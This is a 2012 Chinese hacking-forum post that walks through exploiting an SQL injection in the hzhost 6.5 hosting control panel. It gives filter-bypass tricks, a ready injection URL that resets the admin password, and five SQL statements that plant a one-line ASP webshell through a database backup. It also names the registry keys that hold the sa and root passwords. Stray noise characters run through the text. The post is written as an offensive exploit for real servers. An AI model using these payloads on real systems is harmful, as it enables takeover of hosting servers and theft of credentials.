找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2259|回复: 0
打印 上一主题 下一主题

再爆hzhost6.5虚拟主机管理系统的SQL注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 15:03:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这次继续爆hzhost6.5虚拟主机管理系统的SQL注入漏洞。  _) Q/ T# k0 b
只讲两个要点。# }) g1 P9 ?4 f$ o1 n( G
第一,如何拿网站管理员权限。& Q2 M' R5 \8 E% s& [" D" ~  k
第二,如何备份木马。
3 K; u- W$ K* m# j, m% I( f 这次不是简单的注射点,而是经过安全函数过滤的了点。由于对方没有将变量用单引号包起来,而过滤函数又未过滤完全,导致我们有机会进行注射。/ r7 }7 I3 X" p# Y
我这次还做了个动画。一并发放。希望能让大家玩得"happy"!哈哈。。。2 ^6 i- F1 c. w, M/ \
httP://www.xxbing.com QQ178737315
* V6 R9 R- a# f' R由于我写了很长,而且很累了,所以希望大家回帖鼓励一下。
/ M) J6 A) a/ m' b* ^1 g# p------------开放浏览-------------/ S; X6 s2 c1 J9 j% D4 Q
漏洞存在于\hzhost\hzhost_master\control\ot2_mng\ot2_lst.asp文件中!" p; K, V( Q" G+ Z
-------------------------13-15行----------------------------
+ M7 p$ K; Z1 n0 h$ O" Y querytype=SafeRequest("querytype")  //saferequest函数接受数据% f6 N9 Q7 {: r1 n
if chk_int(querytype)=false then  //检查是否是整数
# H! i/ a. Z9 Q! o    ErrMsg="<font color=#ff0000>对不起</font>,非法操作!..."
+ x0 q0 ~3 L* v6 s( X; n% ^ -------------------------37-42行---------------------------* V) D( C9 N" y- x
elseif querytype=5 then //如果类型为5。就接受qu1数据!
. j, q* m% q8 J7 u: i   qu1=trim(SafeRequest("qu1"))      //saferequest函数接受数据,他自己定义的saferequest函数!
' l6 ]" I0 l1 @! @; [5 s4 M* ~- y   
/ z" O9 h0 J2 b$ U    if  qu1="" then  //不能为空/ s3 i! u% R+ s6 N! `: N! w
         call errorpage(-2,"对不起,请选择参数!")1 X* T' D, C8 _% F& L& X
   end if         
( {, d8 N+ J7 `5 f7 ?. ^      qstring=" and s_regstt="&qu1&" "  //这里是关键  qu1没有用单引号包围,虽然用了saferequest,但是我们可以绕过!$ _2 }; u6 a% n) |( f: V  p
-------------------------62-65行---------------------------) a& H% z6 a" Y$ E5 y2 d. s6 ]$ K
qu7=trim(SafeRequest("qu7")) //saferequest函数接受数据
$ \$ D- t" y9 l if qu7<>"" then
: y( c/ P3 T- t% Tqstring2=" and u_nme='"&qu7&"'" //这里被单引号包围了。  这里被包围了,所以这里成了死点!!
, [* u/ y; V' _% I& k" H4 T0 i end if ( W# x; ?$ e: v" g
--------------------------117行-----------------------------2 _) Q" @- Z: B. O6 \
query="select * from v_ot2lst where  (s_unme='"&session("usrname")&"' or u_fatstr like '%,"&session("usrname")&",%')    "&qstring&qstring2&"  order by "&orderstring 9 S& d) z& N$ b; Y' C& D% ]# J5 l( Z
//到这里就丢进去查询了!" i, t$ v! A4 v4 r
" o5 _8 w- e0 z# N
来看看saferequest()函数。
: j- y( z/ e8 Y7 a  ]8 T4 I' H------------------incs/config.asp中-------------------------
, f# g2 M8 N# s. e. k Function SafeRequest(ParaName) 4 Z$ d: q% a2 L
Dim ParaValue
* ~0 n, }0 Z0 v& P/ M9 T7 [( o ParaValue=Request(ParaName)  //获取数据4 H' S8 g; s' f
if IsNumeric(ParaValue)  then  //如果是数字$ v' S9 A2 @* L! ~6 x
SafeRequest=ParaValue  //那就不过滤,直接赋值( P) v& s: P+ V; w* C5 g
exit Function
6 p' h' O1 ~$ }$ |! [' ]
+ c, ~1 k; D: z2 y7 Q else. I  h# w- }2 E1 R
ParaValuetemp=lcase(ParaValue)    //如果不是数字,先把接到的数据全部转为小写
9 L. n4 N' R3 X+ f$ I tempvalue="select |insert |delete from|'|count(|drop table|update |truncate  |asc(|mid(|char(|xp_cmdshell|exec master|net localgroup administrators|net user| or | and |%20from"
! v* ^6 z9 R- w. p. @) ]; p //定义要过滤的字符!  _( s$ f5 B6 ^! b  |

5 `7 M: k7 N5 }% n( R$ V! O 他过滤方式有问题。。。没有过滤 * / % / -- / ;2 g) M4 E! s: L$ [
而且他过滤的都是select+空格。我们用select%09或者select/**/便能饶过。( g* a: t  j4 D
$ f. `& y3 v: Y
temps=split(tempvalue,"|")           //转为一维数组& b* O5 k0 v1 s2 L  n
for mycount=0 to ubound(temps)       //循环读数组内数据9 t1 w  H. L9 z5 c2 q% D7 {
if  Instr(ParaValuetemp,temps(mycount)) > 0 then   //判断用户提交的数据是否包含了 非法字符。
) h+ u3 `2 d  [4 I' a0 _                 call errorpage(-2,"非法请求!!!")  //如果有则弹出提示!!
9 ~0 p! s6 [. f" M                 response.end9 B7 _" [- m  ?0 A
end if0 R+ _$ L, f0 f/ U! a* q$ n0 u: [
next
& \' a0 ]4 C0 ^3 a6 Q. b7 g- Z5 X SafeRequest=ParaValue
$ C* c+ w; Y9 G+ O9 o end if6 n3 Y7 Y2 k9 y! ~, c" z
End function, e$ o) Q3 D4 V0 p) h; V2 ^
-------------------------------------
0 T: M, A! z9 T4 \$ w3 P( R# k6 a- z- ?7 d& E3 {) c, K# I
所以我们构造注射点的思路就是:不能出现单引号,update,select等等两边都要用%09(tab)..仔细看清楚。上面过滤的是update+空格。select+空格。6 E# U1 j5 C* {$ \$ @7 [" L' T: w4 d
先给出查询语句的框架。
) I, L- x7 V) C* vselect * from v_ot2lst where  (s_unme='username' or u_fatstr like '%,username,%') and s_regstt={我们的语句} and u_nme='1' order by s_addtme desc
  ]) D! ~; E6 J- I+ B$ p& o- j6 M3 U' Y# {) E
为了使语句顺利执行:- j# n, o2 }8 r( {5 k/ {% n5 T" v
我们还要闭合后面的语句。我没有选择注释掉 and u_nme='1' order by s_addtme desc而是闭合他,是因为注释后,实际查询出错了。! c7 B* ]+ W" J1 c9 E) M: v
这里我给出条示范语句,即{我们的语句}, ?' K( ]5 V4 `% G5 R/ @( |+ k7 H2 E
UPDATE%09[memlst] SET u_pss=0x6531306164633339343962613539616262653536653035376632306638383365 WHERE u_nme=0x61646D696E
( l& A: f: j* Q2 z; h7 o
9 h% _5 K6 _0 d" n这条语句能够绕过saferequest函数的检测。没有出现单引号。$ z3 Q6 @+ p) Q( a4 x1 q& \
我们提交:  o1 H2 M0 c; n; d
http://www.xxxxxx.com/control/ot ... amp;qu1=1;UPDATE%09[memlst] SET u_pss=0x6531306164633339343962613539616262653536653035376632306638383365 WHERE u_nme=0x61646D696E;select%09*%09from%09v_ot2lst where s_regstt=1;select%09*%09from%09v_ot2lst where s_regstt=19 h/ q7 ]6 F+ l5 i% f
1 k$ `# F2 b' a( ~1 Q
这句话就能够将admin的密码修改成123456
# m9 G! m/ N! W: ?$ \! R 到此第一个目的就达到了。如果admin不是超级管理员。那么请看《HZHOST域名虚拟主机管理系统sql注射漏洞》中所提到的方法。相关语句请自己转换。
: P. z/ C; W0 g. i 第二步是要备份挂马。
- F1 A. i7 M; m7 E 大家看动画中的备马这么简单,当初难了我老半天。saferequest过滤了char(
5 y) ?9 K5 I/ J' L+ I- R 导致备马的这条语句失败。- K; X, P2 j; R# o. R
declare @a sysname,@s varchar(4000) select @a=db_name(),@s=。。。。。。。。。
, D  j! o( M7 ^1 f* q
- V1 ~& N' Z  ^8 E 有人给我建议改成 @s ntext 等等,换类型都不行。因为我们插入的一句话木马已经固定了数据类型。。
! v9 r9 i/ \4 c( X$ U 由于mssql的宽松性。我把varchar(40000)中加了个空格。并把空格替换成%09成为 varchar%09(4000),也是可以的。这样我们就饶过了char(
7 F3 \6 K2 z# x( w6 f' {8 K9 k2 }' q5 g 接下来放出详细语句。大家放入{我们的语句中}
9 P2 Q, {6 _, W  H( L9 w第 一 步:
+ l5 P2 j% v- Y5 p7 W% c create table [dbo].[shit_tmp] ([cmd] [image])--) O4 p5 M# t6 M0 l9 z( _' P
第 二 步
9 A, i$ D& v9 a+ W7 g  R3 o$ Z2 @, P; D declare @a sysname,@s nvarchar%09(4000)%09select%09@a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate--. v9 t2 o$ W* H$ q* e" I4 N: D
第 三 步
* x# _8 i7 |. H1 M/ w insert%09into%09[shit_tmp](cmd) values(0x3C25657865637574652872657175657374282261222929253E)--- C+ M" b+ @# j7 T% D- V
第 四 步8 F, O" O6 b, }6 F% }6 F& t
declare @a sysname,@s nvarchar%09(4000)%09select%09@a=db_name(),@s=0x44003A005C0068007A0068006F00730074005C0068007A0068006F00730074005F006D00610073007400650072005C0031002E00610073007000 backup log @a to disk=@s--
: s% i% j7 ]& [8 C  T 第 五 步& \, k3 k2 b/ C, A. U: Y2 D
Drop table [shit_tmp]--" k; h( C! Q; h( ?; z$ j; Z; K$ ^

7 Z9 D5 m, x+ ?( G  \( ]# r9 D 上面5句语句是在d:/hzhost/hzhost_master/下生成一个1.asp。里面包含了一个密码为a的一句话木马。
8 {6 d+ N0 E; S0 Q! B( F 一般来说,我们就能拿到webshell. 至于拿webshell后,如何取得系统权限。2 m3 J2 e) Z' G9 Z1 N
请看《对HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用!》
7 _/ A$ x8 e, F% N9 Q7 R
1 x3 y8 x% b7 r最后是答疑部分:! ]1 q# T4 B% b/ l2 }6 b8 h
1:这次是get注射,不像上次是post注射。由于没有文本框字符的限制,所以不需要保存网页到本地。
3 S! ?4 f2 I# q( \$ e6 J5 [) [
3 j3 J9 D( |8 o4 \# N( r! r 2:123456的md5(32)值为e10adc3949ba59abbe56e057f20f883e 用mssql 16进制转换后,成为0x65003100300061006400630033003900340039006200610035003900610062006200650035003600650030003500370066003200300066003800380033006500& S1 L' l2 {; U3 z) u" Z2 R
这是转为nvarchar型的,我们直接更新这个值。会导致被更新用户的密码为乱码。所以我们要转成varchar型的。即:
& P- y0 ~7 |& i; E  N5 w 0x6531306164633339343962613539616262653536653035376632306638383365: k$ F& W3 B/ ~9 H( f- u. q8 Y
大家仔细观察,会发现,其实只是去掉了一些00。。, @' H4 ~0 d& D+ J
所以大家在转换其他md5的时候,注意此问题。
4 d( h* h$ ~( j+ G% Y' H/ b6 Z4 A: C- i9 b8 m$ s* f
3:读sa密码,root密码。我们读的是加密了的。还原必须在本机,每台hzhost主机都有自己的密钥,密钥参与到加密过程。这是导致A主机不能还原B主机密码的原因。
0 Q4 l) m6 l, }. ]4 {; W 另 hzhost虚拟主机平台的所有dll文件。还有一些注册表值我都已取得。有会逆向分析的高手,能做出还原密码程序的高手请联系我。我很希望把他的加密方式弄出来。' W9 t/ m7 y6 t4 N6 C. F6 Z4 j
! W7 C/ }& {5 D* y, d1 L
4:备马的问题,备份成功后,可能出现乱码,是由于截断了的原因,大家用NBSI3。去掉2个截断的勾,再生成语句执行就行了。' Z- D/ K! a; F
有的服务器可能在备马的过程中出现SQL过期,超时。遇到这样的是对方数据库很大,这我也没办法。我没能找出一个比较好的解决方案。大家自己研究吧。, F+ |2 Z! J5 w

: |, O0 I4 O4 T/ a 5:hzhost其实不只这一个注射点,没被单引号包围的变量还有一些。大家自己去找吧。我只是拿出一个来分析。
& `, n! u" A" r9 |! p7 A, l6 i6 ^8 {( ^+ H) U) O
6::
" `2 Q9 ]: a+ B1 L$ d+ g, `8 @sa密码。root密码。
: k- j1 v. ]* I* K: M1 D HKEY_LOCAL_MACHINE\software\hzhost\config\settings\, d: f+ b' E: z* C2 B) G
mysqlpass---root密码8 J1 ]! _$ ~$ ~# @  Z8 X) P
mssqlpss----sa密码8 K2 p! g- V1 e1 D7 j  q
' a9 {1 [7 r% W. I7 _

/ m) v- Z5 e0 N( d* C 7.如果路径不在D:/hzhost
- V/ v' S" o3 ] 那么就是你人品问题!进后台找找普通用户FTP/web的路径,也许会有些用。. d3 x( ?  v# f4 u1 o; e( F
或者去读注册表。
/ i/ E& d# b1 g, z1 K' l2 R HKEY_LOCAL_MACHINE\software\hzhost\config\settings\ 下
' M0 K( D- `4 j  N# G "wwwrootpath"="e:\\wwwroot"
. E6 I# X1 N& e9 e* y2 _* s8 W "urlsiteroot"="D:\\hzhost\\hzhost_url"9 W9 x4 d+ I) P# n
"ftprootpath"="e:\\ftproot"   可以看出什么? 绝对路径放在注册表中。把注册表中的值更新到某个字段,再去读就行了。(比如用户e-mail中。。)
3 g2 ~' d6 K2 Q1 ^' A; F3 G5 P 大家自己去试。我没有碰到不在D盘的hzhost.。只是个思路!
2 s# E! h) z  r. g
# W: P( }6 Q4 U; Z* Z3 C! e1 h3 _ 利用动画下载地址(送给菜鸟同学们,能看懂文章的大不必下载,只是把文章的内容完全演示了一遍。)
9 K; Z, g4 d. Q  S& Qhzhost最新漏洞.rar
) T$ {1 @- K2 ]! G( { 饿。纳米盘速度可能不咋地。但是由于偶的空间FTP坏了。所以,只能放到这里。抱歉啊!!$ y7 d- }! V6 h8 c
! S+ z* J3 e3 d9 `0 Q3 q: A9 ?2 d
最后,还是版权。
! `0 Z% U" j" o) l  {7 |1 }) F! xhttp://www.xxbing.com QQ178737315
0 U0 D" n' W* R( G3 X, C 允许自由转载。但请注明作者。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表